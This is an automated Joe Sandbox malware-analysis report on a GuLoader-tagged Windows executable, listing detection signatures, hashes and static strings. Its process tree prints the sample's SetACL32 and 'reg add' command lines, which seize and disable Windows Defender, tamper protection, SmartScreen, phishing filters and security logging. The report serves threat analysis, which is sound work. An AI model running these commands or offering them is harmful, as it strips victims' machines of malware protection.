Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ptmhbplhxb.exe

Overview

General Information

Sample Name:Ptmhbplhxb.exe
Original Sample Name:92189d2d76db2a5549f25e35a52a2451.exe
Analysis ID:1284605
MD5:92189d2d76db2a5549f25e35a52a2451
SHA1:59708813a1744a959c35a0412f4bd2cae862ffa0
SHA256:b9fdbe8b2868d78c2fbe632a82d102bf5b334b256d21565e3173ba8ebe169ba5
Tags:exeGuLoader
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Submitted sample is a known malware sample
Uses cmd line tools excessively to alter registry or file data
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Too many similar processes found
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Ptmhbplhxb.exe (PID: 2600 cmdline: C:\Users\user\Desktop\Ptmhbplhxb.exe MD5: 92189D2D76DB2A5549F25E35A52A2451)
    • cmd.exe (PID: 7152 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • SetACL32.exe (PID: 5788 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 2028 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 7076 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 5412 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 5228 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 7100 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 3624 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 5916 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • reg.exe (PID: 5628 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5376 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2028 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 984 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1752 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7104 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7052 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7148 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5636 cmdline: reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2380 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5416 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5368 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5380 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7076 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5068 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7128 cmdline: reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7164 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6856 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5788 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5628 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5008 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3576 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5412 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1540 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7084 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7160 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4732 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3624 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5788 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2380 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5628 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Ptmhbplhxb.exeReversingLabs: Detection: 55%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exeReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exeVirustotal: Detection: 32%Perma Link
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exeVirustotal: Detection: 17%Perma Link
Source: Ptmhbplhxb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Ptmhbplhxb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdbI source: SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb source: SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe.0.dr
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_00406268 FindFirstFileA,FindClose,0_2_00406268
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040572D
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F74BF0 std::locale::_Init,std::locale::_Init,FindFirstFileW,GetLastError,FindNextFileW,FindClose,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,RegConnectRegistryW,RegOpenKeyExW,RegCreateKeyExW,RegCloseKey,RegCloseKey,3_2_00F74BF0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F840D0 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,3_2_00F840D0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F9F7A1 FindFirstFileExW,3_2_00F9F7A1
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Ptmhbplhxb.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Ptmhbplhxb.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: SetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com
Source: SetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com.
Source: SetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: PowerRun64.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_004051CA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004051CA
Source: reg.exeProcess created: 69

System Summary

barindex
Submitted sample is a known malware sample
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeDropped file: MD5: b38561661a7164e3bbb04edc3718fe89 Family: Chafer Alias: APT39, Chafer Description: Chafers (also known as APT39) focus on the telecommunications and travel industries suggests intent to perform monitoring, tracking, or surveillance operations against specific individuals. While its targeting scope is global, the activities are concentrated in the Middle East. Government entities targeting suggests a potential secondary intent to collect geopolitical data that may benefit nation-state decision making. References: https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html https://mp.weixin.qq.com/s/c2z4laJ0oq5y0BAEFM3Y9wData Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: Ptmhbplhxb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_004067420_2_00406742
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_00404A090_2_00404A09
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_00406F190_2_00406F19
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F923933_2_00F92393
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F74BF03_2_00F74BF0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F76F693_2_00F76F69
